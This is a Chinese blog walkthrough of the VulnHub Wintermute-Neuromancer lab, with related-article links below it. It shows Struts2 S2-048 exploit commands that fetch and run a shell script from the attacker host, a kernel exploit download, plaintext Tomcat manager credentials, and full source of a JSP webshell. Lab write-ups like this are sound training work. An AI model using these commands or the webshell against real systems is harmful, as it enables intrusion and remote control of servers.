【Wintermute-Neuromancer靶场渗透】

最新推荐文章于 2025-08-05 23:58:52 发布
最新推荐文章于 2025-08-05 23:58:52 发布
阅读量438 收藏 6
点赞数 4
CC 4.0 BY-SA版权
分类专栏: 靶场渗透 文章标签: 安全 web安全 靶场 网络安全 vulnhub
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_61872115/article/details/145337938

文章目录

一、基础信息

二、信息收集

三、漏洞利用

四、反弹shell

五、提权

六、思路拓展

一、基础信息

Kali IP:192.168.56.101

靶机 IP:192.168.56.103

二、信息收集

nmap -sS -sV -p- -A 192.168.56.103

开放了8009,8080(http),34483(ssh)等端口

扫描一下tomcat目录没有发现可利用内容

这里其实有一个路径信息是在上一个靶机获取的,我把它分开来做了

http://192.168.56.103:8080/struts2_2.3.15.1-showcase/showcase.action

三、漏洞利用

得到中间件信息版本,搜索EXP利用

四、反弹shell

直接反弹shell没有成功,那么我们通过将命令写入文件,上传执行进行反弹
 

python exploit_S2-048.py http://192.168.56.103:8080/struts2_2.3.15.1-showcase/integration/saveGangster.action "wget http://192.168.56.101:8090/shell.sh -O /tmp/shell.sh"
python exploit_S2-048.py http://192.168.56.103:8080/struts2_2.3.15.1-showcase/integration/saveGangster.action "chmod +x  /tmp/shell.sh"
python exploit_S2-048.py http://192.168.56.103:8080/struts2_2.3.15.1-showcase/integration/saveGangster.action "sh  /tmp/shell.sh"

五、提权

内核提权

Uname -a

Cat /etc/*release*

searchsploit Ubuntu 16.04

找到了可利用的本地权限提升方式

gcc 44298.c -o exp
wget http://192.168.56.101:8090/exp
chmod +x exp
./exp

但是我这里提示glibc版本较低,无法运行成功,但是看其他wp都是可以的,这里不深究了。

六、思路拓展

通过查看sudo提权和suid位提权没有发现可利用的方式

但是在home目录下发现了tomcat相关信息

Tomcat将用户和密码存储在名为“tomcat-users.xml”的文件中:

cd /usr/local/tomcat/

cd conf

cat tomcat-users.xml

username="Lady3Jane" password=">!Xx3JanexX!<"

html解码:>!Xx3JanexX!<

获得用户名密码:

Lady3Jane / >!Xx3JanexX!<

访问8080页面登陆tomcat后台

http://192.168.56.103:8080/manager/html

这里思路很明确了,就是上传war包获取权限

生成jsp木马

# jsp木马,连接密码为cmd
<%!
    class U extends ClassLoader {
        U(ClassLoader c) {
            super(c);
        }
        public Class g(byte[] b) {
            return super.defineClass(b, 0, b.length);
        }
    }
    public byte[] base64Decode(String str) throws Exception {
        try {
            Class clazz = Class.forName("sun.misc.BASE64Decoder");
            return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
        } catch (Exception e) {
            Class clazz = Class.forName("java.util.Base64");
            Object decoder = clazz.getMethod("getDecoder").invoke(null);
            return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
        }
    }
%>
<%
    String cls = request.getParameter("cmd");
    if (cls != null) {
        new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
    }
%>

将jsp打包为zip,然后将zip后缀修改为war进行上传,也可以上传大马

http://192.168.56.103:8080/shell/shell.jsp

上传成功后蚁剑连接

反弹shell到kali即可

但是也是低权限用户,提权方式参考上文或者其他WP

【甄选靶场Vulnhub百个项目渗透——项目十九~二十:Wintermute-Neuromancer-Straylight(smtp突破,LFI利用,内网横向渗透,端口转发)
人间体佐菲的博客
09-22 1409
Wintermute-Neuromancer-Straylight(smtp突破,LFI利用,内网横向渗透,端口转发)网络安全,信息安全渗透测试
【靶机精讲】Wintermute-v1
Hush78的博客
11-07 1969
这台靶机涉及到了文件包含漏洞、25端口stmp的邮件发送、内网的信息收集、socat端口转发、Stuts2框架漏洞,内容丰富,具有挑战性。这台靶机难度稍微较高,很适合新手学习,设计到的知识点很多,如果你有耐心把他从头到尾完成,那么你一定会收获不少!如果您还有对这台靶机的新思路,不妨在评论区留言交流,我们看到都会第一时间回复!这里是 Hoosh爱吃小笼包,我们下一期再见!
19-VulnHub-WinterMute-V1
尼德霍格007
08-16 683
2219-VulnHub-WinterMute-V1 靶机地址:https://www.vulnhub.com/entry/wintermute-1,239/ 目标:得到root权限&找到flag.txt 作者:尼德霍格007 时间:2021-8-14 注意:此次渗透在VMware虚拟机中演示,kali机IP地址为10.0.2.15。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,概不负责。 这次渗透和之前几次不太一样,以前都是一台靶机,这次有两台靶机,要先获取 Strayligh
oscp备考,oscp系列——Wintermute-v1靶场,两台靶机内网渗透,LFI漏洞,screen4.5提权,struts2.3远程代码执行漏洞,CVE-2017-16995提权
2202_75361164的博客
02-15 1477
oscp备考,oscp系列——Wintermute-v1靶场,两台靶机内网渗透,LFI漏洞,screen4.5提权,struts2.3远程代码执行漏洞,CVE-2017-16995提权难度简单。 - 对于低权限shell获取涉及:ntopng弱口令,信息收集得到目录,LFI漏洞 - 对于提权:screen4.5提权 - 对于内网:struts2.3远程代码执行漏洞,Ubuntu内核提权
【7 Wintermute渗透笔记】
勿山几已
04-19 404
本文仅用于技术讨论与研究,不做任何导向,对于所有笔记中复现的这些终端、服务器或者实验环境,均为自行搭建的公开靶场,请勿在现实环境中模仿、操作。本文涉及到的工具仅就用到的方面做简要描述,如果想了解更详细的信息,请自行参阅其他技术资料。如果列出的技术用于其他任何目标,作者概不负责。最后请各位师傅斧正!!!
vulnhub Wintermute
n1ght的博客
01-29 672
这次这个靶机让我学到挺多的,不过离谱的是师傅们做的时候,一定要仔细的配置靶机的网络。这个靶机是vbox打开的。渗透机IP:192.168.10.5靶机:第一张网卡IP: 192.168.10.6第二章网卡IP: 192.168.11.7。
内网综合渗透测试——WinterMute: 1靶场
sucker的博客
02-25 1571
这个漏洞与 Apache Struts2 框架的 OGNL(Object-Graph Navigation Language)表达式语言的处理方式有关,攻击者可以通过构造特定的 payload 在目标服务器上执行任意命令。这个版本的 glibc 是比较旧的(发布于 2016 年),因此它支持的 GCC 编译器版本通常也会受到一定限制。在很多传统的 Java Web 项目中,Struts 仍然是一个常见的选择。通过系统化的攻击链构建,可逐步突破Straylight的防御体系,最终实现网络#2的渗透目标。
VulnHub】【2023年07月18日】最新全部靶场详情(中)
热门推荐
惟忆
07-18 1万+
VulnHub】【2023年07月18日】最新全部靶场详情(中)
Wintermute Engine DevKit-开源
04-27
Wintermute Engine Development Kit是一套用于创建和运行图形化“点击即用”冒险游戏的工具,包括传统的2D游戏和现代的2.5D游戏(2D背景上的3D角色)。
wes:Wintermute端点搜寻-Search source code
03-24
WES-Wintermute端点搜索 WES是用于Web应用程序的静态代码分析器,它没有采用传统的方法来显示我们的代码中可能存在问题的地方。 相反,WES只是简单地从源代码中提取所有的端点,参数,模板,方法和行号。 然后,这些...
Wintermute
10-28
"Wintermute"是一个与字体设计相关的主题,可能指的是一个特定的字体家族或者一款软件。在IT行业中,字体设计是用户体验中的一个重要元素,尤其在网页设计、图形设计、排版和印刷领域。 Wintermute这个名字可能源自...
Fabarta个人专属智能体限时体验中:高效、安全的长文写作新搭档
Fabarta的博客
08-01 406
此外,报告还提到了数据孤岛、数据质量不高的问题,这些都阻碍了企业的跨域协同,也降低了企业的数据向知识转化的效率。在保证用户的资料、文件与数据完全私密不泄露的情况下,该产品完美融合了用户本地数据与互联网上可以触达的公开信息,快速应答用户的各类请求与问题。1)王律师基于个人构建好的本地知识库,输入需求:“分析本案胜诉关键点,撰写金融借款合同纠纷证据规则实务指南,引用3个类案,字数2000左右”;5)智能体生成专业化内容,王律师可实时调整个别段落,对不满意的段落进行改写、润色,插入类案对比等;
星图云开发者平台赋能商储油安全管控数字化转型
DevMate的博客
08-05 329
某商业储备油分公司是其集团公司国家原油商业储备的生产经营主体,肩负着15座跨省市油库的安全管理重任。在传统管理模式下,总部对分散库区的监管面临严峻挑战:由于地理位置分散,储罐液位波动、设备异常运行等关键状态无法实时获取,往往依赖人工逐级上报导致决策滞后;各库区独立建设的安防系统、设备监测平台数据格式互不兼容,标准不统一,形成数据协同壁垒;当突发泄漏或火灾险情时,应急资源调度依赖电话协调与纸质预案,响应效率难以满足快速处置要求。
Goby 漏洞安全通告| NestJS DevTools /inspector/graph/interact 命令执行漏洞(CVE-2025-54782)
m0_46699477的博客
08-05 166
其 /inspector/graph/interact 接口存在远程代码执行漏洞(CVE-2025-54782)。攻击者可以通过特制的代码注入在受影响的 NestJS DevTools 服务器上执行任意命令,可能导致服务器被完全控制、数据泄露和系统崩溃等严重后果。该漏洞允许攻击者通过特制的代码注入在受影响的 NestJS DevTools 服务器上执行任意命令,可能导致服务器被完全控制、数据泄露和系统崩溃等严重后果。
Web 安全之开放重定向攻击(Open Redirect )详解
路多辛的所思所想
08-03 934
摘要: 开放重定向漏洞存在于网站不安全处理用户可控URL时,攻击者通过构造恶意链接将用户从可信网站重定向至钓鱼或恶意网站。攻击流程包括诱骗用户点击、服务器执行重定向、最终实施窃取信息等攻击。防范措施包括避免直接使用用户输入URL、实施白名单验证、使用相对路径及重定向确认页面。该漏洞虽不直接破坏系统,但会显著提高钓鱼攻击成功率,需通过严格验证和定期安全审计加以防范。(149字)
Python包安全工程实践:构建安全可靠的Python生态系统
最新发布
Programming Talk
08-05 195
建立了安全开发流程与规范实现了依赖安全管理与漏洞扫描应用了现代加密与安全通信技术设计了认证授权系统集成了安全审计与监控实施了漏洞管理与应急响应应用了安全测试技术保障了供应链安全完整安全示例可在GitHub查看:[安全工程示例仓库]零信任架构应用运行时应用自保护(RASP)机密计算技术合规自动化(如GDPR、CCPA)
安全扫描:目标主机支持RSA密钥交换问题
weixin_50859396的博客
08-04 734
Nginx中禁用RSA加密算法需配置ssl_ciphers排除所有含RSA的套件,仅保留ECDSA等非RSA算法。具体步骤:1)修改配置文件,设置ssl_ciphers为HIGH:!aNULL:!MD5:!RSA;2)推荐使用ECDSA证书;3)验证配置后重载Nginx。注意事项:需确保使用ECDSA证书避免兼容问题,且评估客户端支持情况。该方案能提升安全性,避免RSA潜在风险。
OAuth 2.0 的安全升级版授权协议 OAuth 2.1 详解
路多辛的所思所想
08-02 696
OAuth 2.1 是对 OAuth 2.0 协议的一次重大更新,废弃了不安全的用法,整合了最新的安全实践,从而提高了协议的安全性和易用性。虽然“OAuth 2.1”从名称上看起来像是一个全新的版本,但实际上并非对 OAuth 2.0 的彻底的颠覆,其实是 OAuth 2.0 的最佳实践集合,整合了多年来社区反馈的最佳使用方式并做了必要的安全性改进。
BeeWorks私有化即时通讯,局域网办公安全可控
weixin_53855915的博客
08-05 333
数据安全不可控:公共云IM 的消息存储与传输依赖外部服务器,即使在局域网内使用,部分数据仍可能通过云端同步 “外泄”,对于涉及生产图纸、科研数据、涉密文件的沟通而言,风险不可接受。操作审计追溯:所有权限变更、消息删除、文件下载等操作均生成日志,存储在局域网审计服务器中,支持按时间、用户、操作类型检索,满足“可追溯、可问责” 需求。权限管理僵化:局域网内组织架构复杂(如工厂的车间、班组层级),公共云IM 的标准化权限体系无法适配 “部门隔离”“跨层级禁言” 等精细化需求。
WES-Wintermute端点搜索工具:静态代码分析新体验
资源摘要信息:"wes:Wintermute端点搜寻-Search source code" 知识点详细说明: 1. WES工具介绍: WES(Wintermute Endpoints Scanner)是一个用于Web应用程序的静态代码分析器。与传统的动态扫描工具不同,WES...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

一纸-荒芜

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值